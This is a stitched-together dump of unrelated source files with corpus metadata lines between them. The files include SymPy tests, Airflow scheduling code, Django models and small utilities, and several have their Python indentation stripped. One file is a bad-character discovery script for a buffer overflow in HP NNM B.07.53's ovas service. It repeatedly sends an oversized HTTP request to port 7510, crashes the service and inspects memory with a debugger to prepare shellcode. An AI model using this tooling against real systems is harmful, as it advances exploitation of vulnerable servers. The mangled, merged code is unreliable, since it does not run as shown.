"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_put_obms_by_node_id(identifier='invalid_ID', body=self.__test_obm)
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
@test(groups=['node_get_obm_invalid'], depends_on_groups=['node_put_obm_invalid'])
def test_node_get_obm_invalid_node_id(self):
"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_get_obms_by_node_id(identifier='invalid_ID')
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
| apache-2.0 | -2,104,577,647,102,050,300 | 41.978678 | 114 | 0.540904 | false | 3.631238 | true | false | false |
QuincyWork/AllCodes | Python/Codes/Practice/LeetCode/211 Add and Search Word - Data structure design.py | 1 | 1913 |
# define const variable
_MAX_LETTER_SIZE = 27
_STRING_END_TAG = '#'
class TireNode(object):
def __init__(self,x):
self.value = x
self.childNodes = {}
class WordDictionary(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TireNode(0)
def addWord(self, word):
"""
Adds a word into the data structure.
:type word: str
:rtype: void
"""
word = word + _STRING_END_TAG
currentNode = self.root
childNode = None
for value in word:
childNode = currentNode.childNodes.get(value)
if not childNode:
childNode = TireNode(value)
currentNode.childNodes[value] = childNode
currentNode = childNode
def __searchChild(self,node,value):
currentNode = node
if not value:
return True
result = False
if value[0] == '.':
for key,child in currentNode.childNodes.items():
if self.__searchChild(child,value[1:]):
result = True
break
else:
child = currentNode.childNodes.get(value[0])
if child:
result = self.__searchChild(child,value[1:])
return result
def search(self, word):
"""
Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.
:type word: str
:rtype: bool
"""
word = word + _STRING_END_TAG
return self.__searchChild(self.root, word)
if __name__ == '__main__':
d = WordDictionary()
d.addWord("bad")
d.addWord("dad")
d.addWord("mad")
print(d.search("bad"))
print(d.search("pad"))
print(d.search(".ad"))
print(d.search("b.."))
| mit | -8,859,075,159,283,428,000 | 23.189873 | 125 | 0.521193 | false | 4.172489 | false | false | false |
thorwhalen/ut | stats/util.py | 1 | 2022 | __author__ = 'thor'
from numpy import zeros, argmin, array, unique, where
from scipy.spatial.distance import cdist
def _df_picker(df, x_cols, y_col):
return df[x_cols].as_matrix(), df[[y_col]].as_matrix()
def df_picker_data_prep(x_cols, y_col):
return lambda df: _df_picker(df, x_cols, y_col)
def binomial_probs_to_multinomial_probs(binomial_probs):
multinomial_probs = zeros((len(binomial_probs), 2))
multinomial_probs[:, 1] = binomial_probs
multinomial_probs[:, 0] = 1 - multinomial_probs[:, 1]
return multinomial_probs
def multinomial_probs_to_binomial_probs(multinomial_probs):
return multinomial_probs[:, 1]
def normalize_to_one(arr):
arr = array(arr)
return arr / float(sum(arr))
def point_idx_closest_to_centroid(X, centroid=None):
"""
    X is an n x m ndarray of n points in m dimensions.
    point_idx_closest_to_centroid(X, centroid) returns the index of the point of X (a row of X) that is
    closest to the given centroid point. If centroid is not given, the actual centroid, X.mean(axis=0), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return argmin(cdist(X, [centroid])[:, 0])
def point_closest_to_centroid(X, centroid=None):
"""
    X is an n x m ndarray of n points in m dimensions.
    point_closest_to_centroid(X, centroid) returns the point of X (a row of X) that is closest to the given
    centroid point. If centroid is not given, the actual centroid, X.mean(axis=0), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return X[argmin(cdist(X, [centroid])[:, 0])]
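# Quick worked example (illustrative values only): for
#   X = array([[0., 0.], [10., 0.], [4., 0.]])
# the centroid is roughly [4.67, 0.], so point_idx_closest_to_centroid(X) == 2
# and point_closest_to_centroid(X) returns array([4., 0.]).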
def get_cluster_representatives_indices(X, clus_labels, clus_centers):
representative_indices = list()
for label in unique(clus_labels):
cluster_point_indices = where(clus_labels == label)[0]
min_idx = argmin(cdist(X[cluster_point_indices, :], [clus_centers[label, :]])[:, 0])
representative_indices.append(cluster_point_indices[min_idx])
return array(representative_indices)
| mit | 2,205,652,758,375,168,500 | 32.7 | 120 | 0.674085 | false | 3.277147 | false | false | false |
greyshell/linuxJuicer | badchar-detection-automated/badchar-detection-HPNNM-B.07.53.py | 1 | 8764 | #!/usr/bin/env python
# Description: Identify good and bad chars in HPNNM-B.07.53
# author: greyshell
# Script requirements: python 2.7 x86, pydbg 32bit binary, python wmi, pywin32
# Copy pydbg inside C:\Python27\Lib\site-packages\
# Copy pydasm.pyd inside C:\Python27\Lib\site-packages\pydbg\
import os
import socket
import subprocess
import sys
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# Global variables
allchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
request_template = (
"GET /topology/homeBaseView HTTP/1.1\r\n"
"Host: {}\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
"Content-Length: 1048580\r\n\r\n"
)
# Current char that is being checked
cur_char = ""
badchars = []
goodchars = []
evil_str_sent = False
service_is_running = False
def chars_to_str(chars):
# Convert a list of chars to a string
result = ""
for char in chars:
result += "\\x{:02x}".format(ord(char))
return result
def crash_service():
# Send malformed data to ovas service in order to crash it. Function runs in an independent thread
global evil_str_sent, cur_char, badchars, goodchars, allchars
global service_is_running
char_counter = -1
timer = 0
while True:
# Don't send evil string if process is not running
if not service_is_running:
time.sleep(1)
continue
# If main loop reset the evil_str_sent flag to False, sent evil_str again
if not evil_str_sent:
timer = 0
char_counter += 1
if char_counter > len(allchars)-1:
print("[+] Bad chars: {}.".format(chars_to_str(badchars)))
print("[+] Good chars: {}.".format(chars_to_str(goodchars)))
print("[+] Done.")
# Hack to exit application from non-main thread
os._exit(0)
cur_char = allchars[char_counter]
# During crash [ESP + 4C] points to ("A" * 1025)th position
crash = "A" * 1025 + cur_char * 4 + "B" * 2551
evil_str = request_template.format(crash)
print("[+] Sending evil HTTP request...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
sock.send(evil_str)
sock.close()
except:
print("[+] Error sending malicious buffer; service may be down.")
print("[+] Restarting the service and retrying...")
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
finally:
evil_str_sent = True
else:
if timer > 10:
print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
print("[+] Marking last char as bad and killing the service...")
badchars.append(cur_char)
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
time.sleep(1)
timer += 1
return
def is_service_started():
# Check if service was successfully started
print("[+] Making sure the service was restarted...")
service_check_counter = 0
while not service_is_running:
if service_check_counter > 4: # Give it 5 attempts
return False
for process in wmi.WMI().Win32_Process():
if process.Name=='ovas.exe':
return process.ProcessId
service_check_counter += 1
time.sleep(1)
def is_service_responsive():
# Check if service responds to HTTP requests
print("[+] Making sure the service responds to HTTP requests...")
service_check_counter = 0
while not service_is_running:
# Give it 5 attempts
if service_check_counter > 4:
return False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
test_str = request_template.format("127.0.0.1")
sock.send(test_str)
# Give response 1 second to arrive
sock.settimeout(1.0)
resp = sock.recv(1024)
if resp:
return True
sock.close()
except Exception as e:
pass
service_check_counter += 1
def restart_service():
# Restart ovas.exe service and return its PID
global service_is_running
service_is_running = False
# Check that the service is running before stopping it
for process in wmi.WMI().Win32_Process():
if process.Name=='ovas.exe':
print("[+] Stopping the service...")
# Forcefully terminate the process
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
print("[+] Starting the service...")
# Start the process with reliability
subprocess.Popen('ovstop -c ovas').communicate()
subprocess.Popen('ovstart -c ovas').communicate()
pid = is_service_started()
if pid:
print("[+] The service was restarted.")
else:
print("[-] Service was not found in process list. Restarting...")
return restart_service()
if is_service_responsive():
print("[+] Service responds to HTTP requests. Green ligth.")
service_is_running = True
return pid
else:
print("[-] Service does not respond to HTTP requests. Restarting...")
return restart_service()
def check_char(rawdata):
# Compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
global badchars, goodchars
hexdata = dbg.hex_dump(rawdata)
print("[+] Buffer: {}".format(hexdata))
# Sent data must be equal to data in memory
if rawdata == (cur_char * 4):
goodchars.append(cur_char)
print("[+] Char {} is good.".format(chars_to_str(cur_char)))
print("[+] Good chars so far: {}.".format(chars_to_str(goodchars)))
with open("goodchars.txt",'w') as f:
f.write(chars_to_str(goodchars))
else:
badchars.append(cur_char)
print("[+] Char {} is bad.".format(chars_to_str(cur_char)))
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
return
def _access_violation_handler(dbg):
# On access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
print("[+] Access violation caught.")
# [ESP + 0x4C] points to our test buffer
esp_offset = 0x4C
buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
buf_address = dbg.flip_endian_dword(buf_address)
print("[+] [DEBUG] buf_address: {}".format(buf_address))
if buf_address:
# Read 4 bytes test buffer
buffer = dbg.read(buf_address, 0x4)
print("[+] buffer is " + buffer);
else:
# Now when the first request sent is the one for checking if the
# service responds, the buf_address sometimes returns 0. This is to
# handle that case.
buffer = ""
print("[+] Checking whether the char is good or bad...")
check_char(buffer)
dbg.detach()
return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
# Create a debugger instance and attach to minishare PID"""
dbg = pydbg()
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
while True:
try:
print("[+] Attaching debugger to pid: {}.".format(pid))
if dbg.attach(pid):
return dbg
else:
return False
except Exception as e:
print("[+] Error while attaching: {}.".format(e.message))
return False
if __name__ == '__main__':
# Create and start crasher thread
crasher_thread = threading.Thread(target=crash_service)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] thread started");
# Main loop
while True:
pid = restart_service()
print("[+] restart_service "+str(pid));
dbg = debug_process(pid)
print("[+] dbg started");
if dbg:
# Tell crasher thread to send malicious input to process
evil_str_sent = False
# Enter the debugging loop
dbg.run() | mit | 5,686,919,584,607,260,000 | 29.754386 | 116 | 0.674464 | false | 2.659788 | false | false | false |
MarxDimitri/schmankerl | schmankerlapp/models.py | 1 | 1505 | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Restaurant(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='restaurant')
name = models.CharField(max_length=500)
phone = models.CharField(max_length=500)
address = models.CharField(max_length=500)
logo = models.ImageField(upload_to='restaurant_logo/', blank=False)
def __str__(self):
return self.name
class Customer(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='customer')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Driver(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='driver')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Meal(models.Model):
restaurant = models.ForeignKey(Restaurant)
name = models.CharField(max_length=500)
short_description = models.CharField(max_length=500)
image = models.ImageField(upload_to='meal_images/', blank=False)
price = models.FloatField(default=0)
def __str__(self):
return self.name
| apache-2.0 | 687,804,165,970,565,200 | 35.707317 | 90 | 0.706312 | false | 3.626506 | false | false | false |
Fokko/incubator-airflow | airflow/ti_deps/deps/trigger_rule_dep.py | 1 | 9884 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from sqlalchemy import case, func
import airflow
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.utils.db import provide_session
from airflow.utils.state import State
class TriggerRuleDep(BaseTIDep):
"""
Determines if a task's upstream tasks are in a state that allows a given task instance
to run.
"""
NAME = "Trigger Rule"
IGNOREABLE = True
IS_TASK_DEP = True
@provide_session
def _get_dep_statuses(self, ti, session, dep_context):
TI = airflow.models.TaskInstance
TR = airflow.utils.trigger_rule.TriggerRule
# Checking that all upstream dependencies have succeeded
if not ti.task.upstream_list:
yield self._passing_status(
reason="The task instance did not have any upstream tasks.")
return
if ti.task.trigger_rule == TR.DUMMY:
yield self._passing_status(reason="The task had a dummy trigger rule set.")
return
# TODO(unknown): this query becomes quite expensive with dags that have many
# tasks. It should be refactored to let the task report to the dag run and get the
# aggregates from there.
qry = (
session
.query(
func.coalesce(func.sum(
case([(TI.state == State.SUCCESS, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.SKIPPED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.FAILED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.UPSTREAM_FAILED, 1)], else_=0)), 0),
func.count(TI.task_id),
)
.filter(
TI.dag_id == ti.dag_id,
TI.task_id.in_(ti.task.upstream_task_ids),
TI.execution_date == ti.execution_date,
TI.state.in_([
State.SUCCESS, State.FAILED,
State.UPSTREAM_FAILED, State.SKIPPED]),
)
)
successes, skipped, failed, upstream_failed, done = qry.first()
yield from self._evaluate_trigger_rule(
ti=ti,
successes=successes,
skipped=skipped,
failed=failed,
upstream_failed=upstream_failed,
done=done,
flag_upstream_failed=dep_context.flag_upstream_failed,
session=session)
@provide_session
def _evaluate_trigger_rule(
self,
ti,
successes,
skipped,
failed,
upstream_failed,
done,
flag_upstream_failed,
session):
"""
        Yields a dependency status that indicates whether the given task instance's trigger
rule was met.
:param ti: the task instance to evaluate the trigger rule of
:type ti: airflow.models.TaskInstance
:param successes: Number of successful upstream tasks
:type successes: int
:param skipped: Number of skipped upstream tasks
:type skipped: int
:param failed: Number of failed upstream tasks
:type failed: int
:param upstream_failed: Number of upstream_failed upstream tasks
:type upstream_failed: int
:param done: Number of completed upstream tasks
:type done: int
:param flag_upstream_failed: This is a hack to generate
the upstream_failed state creation while checking to see
whether the task instance is runnable. It was the shortest
path to add the feature
:type flag_upstream_failed: bool
:param session: database session
:type session: sqlalchemy.orm.session.Session
"""
TR = airflow.utils.trigger_rule.TriggerRule
task = ti.task
upstream = len(task.upstream_task_ids)
tr = task.trigger_rule
upstream_done = done >= upstream
upstream_tasks_state = {
"total": upstream, "successes": successes, "skipped": skipped,
"failed": failed, "upstream_failed": upstream_failed, "done": done
}
# TODO(aoen): Ideally each individual trigger rules would be its own class, but
# this isn't very feasible at the moment since the database queries need to be
# bundled together for efficiency.
# handling instant state assignment based on trigger rules
if flag_upstream_failed:
if tr == TR.ALL_SUCCESS:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ALL_FAILED:
if successes or skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_SUCCESS:
if upstream_done and not successes:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_FAILED:
if upstream_done and not (failed or upstream_failed):
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_FAILED:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped == upstream:
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_SKIPPED:
if skipped:
ti.set_state(State.SKIPPED, session)
if tr == TR.ONE_SUCCESS:
if successes <= 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task success, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ONE_FAILED:
if not failed and not upstream_failed:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task failure, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ALL_SUCCESS:
num_failures = upstream - successes
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_FAILED:
num_successes = upstream - failed - upstream_failed
if num_successes > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have failed, but found {1} non-failure(s). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_successes, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_DONE:
if not upstream_done:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have completed, but found {1} task(s) that "
"weren't done. upstream_tasks_state={2}, "
"upstream_task_ids={3}"
.format(tr, upstream_done, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_FAILED:
num_failures = upstream - successes - skipped
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded or been skipped, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_SKIPPED:
if not upstream_done or (skipped > 0):
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to not have been skipped, but found {1} task(s) skipped. "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, skipped, upstream_tasks_state,
task.upstream_task_ids))
else:
yield self._failing_status(
reason="No strategy to evaluate trigger rule '{0}'.".format(tr))
| apache-2.0 | -311,230,294,439,406,660 | 43.32287 | 94 | 0.563234 | false | 4.48254 | false | false | false |
yeleman/health_ident | health_ident/management/commands/export_j2me.py | 1 | 2794 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import os
import zipfile
from django.conf import settings
from optparse import make_option
from django.core.management.base import BaseCommand
from django.template import loader, Context
from health_ident.models import Entity, HealthEntity
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('-f',
help='CSV file to export health_entity_properties to',
action='store',
dest='input_file'),
make_option('-s',
help='Comma-separated list of Region Slugs to include',
action='store',
dest='only_regions'),
)
def handle(self, *args, **options):
export_dir = os.path.join(settings.BASE_DIR, 'j2me')
if not os.path.exists(export_dir):
os.mkdir(export_dir)
if options.get('only_regions'):
only_regions = options.get('only_regions').split(',')
regions = HealthEntity.objects.filter(slug__in=only_regions)
else:
mali = Entity.objects.get(slug='mali')
regions = HealthEntity.objects.filter(parent=mali)
print("Exporting Health Entities...")
for region in regions:
for district in region.get_children():
district_file_content = loader.get_template("j2me/EntityHashTableDistrict.java") \
.render(Context({'district': district}))
with open(os.path.join(export_dir, "EntityHashTable{}.java".format(district.slug)), 'w') as f:
f.write(district_file_content.encode('utf-8'))
print(district.name)
with open(os.path.join(export_dir, "Utils.java"), 'w') as f:
f.write(loader.get_template("j2me/Utils.java").render(Context({})).encode('utf-8'))
with open(os.path.join(export_dir, "EntityHashTable.java"), 'w') as f:
f.write(loader.get_template("j2me/EntityHashTable.java").render(Context({})).encode('utf-8'))
region_file_content = loader.get_template("j2me/StaticCodes.java") \
.render(Context({'regions': regions}))
with open(os.path.join(export_dir, "StaticCodes.java"), 'w') as f:
f.write(region_file_content.encode('utf-8'))
zf = zipfile.ZipFile(options.get('input_file'), mode='w')
for asset in os.listdir(os.path.join(export_dir)):
zf.write(os.path.join(export_dir, asset),
os.path.join('snisi', 'entities', asset))
zf.close() | unlicense | 8,823,605,234,748,818,000 | 35.298701 | 110 | 0.582319 | false | 3.885953 | false | false | false |
sumihai-tekindo/account_sicepat | add_sub_menu/models/check_id.py | 1 | 1245 | from datetime import datetime
from openerp.osv import fields,osv
from openerp.tools.translate import _
class purchase_requisition_line(osv.osv):
_inherit = "purchase.requisition.line"
def stock_out(self, cr, uid, ids,stock_out):
if self.stock_out:
return {
'view_type': 'form',
'flags': {'action_buttons': True},
'view_mode': 'kanban,form',
'res_model': 'stock.picking.type',
'target': 'current',
'res_id': 'stock.picking',
'type': 'ir.actions.act_window'
}
# def onchange_product_id(self, cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=None):
# oc_res = super(purchase_requisition_line,self).onchange_product_id(cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=context)
# if(product_id):
# product = self.pool.get('product.product').browse(cr,uid,product_id,context=context)
# if (product.default_code=='Asset'):
# warning={
# 'title':'WARNING',
# 'message':"There are %s %s for %s in stock"%(product.qty_available,product.uom_id.name,product.name)
# }
# oc_res.update({'warning':warning})
# return oc_res
| gpl-3.0 | -3,897,940,405,699,393,500 | 35.787879 | 191 | 0.659438 | false | 2.875289 | false | false | false |
nkoep/blaplay | blaplay/formats/wav.py | 1 | 1831 | # blaplay, Copyright (C) 2012 Niklas Koep
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import wave
from _blatrack import BlaTrack
from blaplay.formats import TagParseError
from _identifiers import *
class Wav(BlaTrack):
__slots__ = ("extensions")
extensions = ["wav"]
def _read_tags(self):
# The wave module uses fixed sampling rates. Custom sampling rates are
# therefore mapped to commonly used ones. Additionally, it doesn't
# detect compression modes like ADPCM. Therefore we just specify
# `lossless' as encoding type; it's not like these are common
# use-cases anyway.
try:
audio = wave.open(self.uri, "r")
except wave.Error:
raise TagParseError
self[SAMPLING_RATE] = audio.getframerate()
self[CHANNELS] = audio.getnchannels()
self[CHANNEL_MODE] = "Mono" if self[CHANNELS] == 1 else "Stereo"
self[BITRATE] = (audio.getframerate() * 8 * audio.getsampwidth() *
self[CHANNELS])
self[LENGTH] = audio.getnframes() / audio.getframerate()
self[FORMAT] = "WAVE"
self[ENCODING] = "lossless"
audio.close()
| gpl-2.0 | -6,617,483,503,426,571,000 | 35.62 | 78 | 0.677226 | false | 3.9718 | false | false | false |
kaushik94/sympy | sympy/printing/tests/test_rcode.py | 7 | 14176 | from sympy.core import (S, pi, oo, Symbol, symbols, Rational, Integer,
GoldenRatio, EulerGamma, Catalan, Lambda, Dummy, Eq)
from sympy.functions import (Piecewise, sin, cos, Abs, exp, ceiling, sqrt,
gamma, sign, Max, Min, factorial, beta)
from sympy.sets import Range
from sympy.logic import ITE
from sympy.codegen import For, aug_assign, Assignment
from sympy.utilities.pytest import raises
from sympy.printing.rcode import RCodePrinter
from sympy.utilities.lambdify import implemented_function
from sympy.tensor import IndexedBase, Idx
from sympy.matrices import Matrix, MatrixSymbol
from sympy import rcode
from difflib import Differ
from pprint import pprint
x, y, z = symbols('x,y,z')
def test_printmethod():
class fabs(Abs):
def _rcode(self, printer):
return "abs(%s)" % printer._print(self.args[0])
assert rcode(fabs(x)) == "abs(x)"
def test_rcode_sqrt():
assert rcode(sqrt(x)) == "sqrt(x)"
assert rcode(x**0.5) == "sqrt(x)"
assert rcode(sqrt(x)) == "sqrt(x)"
def test_rcode_Pow():
assert rcode(x**3) == "x^3"
assert rcode(x**(y**3)) == "x^(y^3)"
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(1/(g(x)*3.5)**(x - y**x)/(x**2 + y)) == \
"(3.5*2*x)^(-x + y^x)/(x^2 + y)"
assert rcode(x**-1.0) == '1.0/x'
assert rcode(x**Rational(2, 3)) == 'x^(2.0/3.0)'
_cond_cfunc = [(lambda base, exp: exp.is_integer, "dpowi"),
(lambda base, exp: not exp.is_integer, "pow")]
assert rcode(x**3, user_functions={'Pow': _cond_cfunc}) == 'dpowi(x, 3)'
assert rcode(x**3.2, user_functions={'Pow': _cond_cfunc}) == 'pow(x, 3.2)'
def test_rcode_Max():
# Test for gh-11926
assert rcode(Max(x,x*x),user_functions={"Max":"my_max", "Pow":"my_pow"}) == 'my_max(x, my_pow(x, 2))'
def test_rcode_constants_mathh():
p=rcode(exp(1))
assert rcode(exp(1)) == "exp(1)"
assert rcode(pi) == "pi"
assert rcode(oo) == "Inf"
assert rcode(-oo) == "-Inf"
def test_rcode_constants_other():
assert rcode(2*GoldenRatio) == "GoldenRatio = 1.61803398874989;\n2*GoldenRatio"
assert rcode(
2*Catalan) == "Catalan = 0.915965594177219;\n2*Catalan"
assert rcode(2*EulerGamma) == "EulerGamma = 0.577215664901533;\n2*EulerGamma"
def test_rcode_Rational():
assert rcode(Rational(3, 7)) == "3.0/7.0"
assert rcode(Rational(18, 9)) == "2"
assert rcode(Rational(3, -7)) == "-3.0/7.0"
assert rcode(Rational(-3, -7)) == "3.0/7.0"
assert rcode(x + Rational(3, 7)) == "x + 3.0/7.0"
assert rcode(Rational(3, 7)*x) == "(3.0/7.0)*x"
def test_rcode_Integer():
assert rcode(Integer(67)) == "67"
assert rcode(Integer(-1)) == "-1"
def test_rcode_functions():
assert rcode(sin(x) ** cos(x)) == "sin(x)^cos(x)"
assert rcode(factorial(x) + gamma(y)) == "factorial(x) + gamma(y)"
assert rcode(beta(Min(x, y), Max(x, y))) == "beta(min(x, y), max(x, y))"
def test_rcode_inline_function():
x = symbols('x')
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(g(x)) == "2*x"
g = implemented_function('g', Lambda(x, 2*x/Catalan))
assert rcode(
g(x)) == "Catalan = %s;\n2*x/Catalan" % Catalan.n()
A = IndexedBase('A')
i = Idx('i', symbols('n', integer=True))
g = implemented_function('g', Lambda(x, x*(1 + x)*(2 + x)))
res=rcode(g(A[i]), assign_to=A[i])
ref=(
"for (i in 1:n){\n"
" A[i] = (A[i] + 1)*(A[i] + 2)*A[i];\n"
"}"
)
assert res == ref
def test_rcode_exceptions():
assert rcode(ceiling(x)) == "ceiling(x)"
assert rcode(Abs(x)) == "abs(x)"
assert rcode(gamma(x)) == "gamma(x)"
def test_rcode_user_functions():
x = symbols('x', integer=False)
n = symbols('n', integer=True)
custom_functions = {
"ceiling": "myceil",
"Abs": [(lambda x: not x.is_integer, "fabs"), (lambda x: x.is_integer, "abs")],
}
assert rcode(ceiling(x), user_functions=custom_functions) == "myceil(x)"
assert rcode(Abs(x), user_functions=custom_functions) == "fabs(x)"
assert rcode(Abs(n), user_functions=custom_functions) == "abs(n)"
def test_rcode_boolean():
assert rcode(True) == "True"
assert rcode(S.true) == "True"
assert rcode(False) == "False"
assert rcode(S.false) == "False"
assert rcode(x & y) == "x & y"
assert rcode(x | y) == "x | y"
assert rcode(~x) == "!x"
assert rcode(x & y & z) == "x & y & z"
assert rcode(x | y | z) == "x | y | z"
assert rcode((x & y) | z) == "z | x & y"
assert rcode((x | y) & z) == "z & (x | y)"
def test_rcode_Relational():
from sympy import Eq, Ne, Le, Lt, Gt, Ge
assert rcode(Eq(x, y)) == "x == y"
assert rcode(Ne(x, y)) == "x != y"
assert rcode(Le(x, y)) == "x <= y"
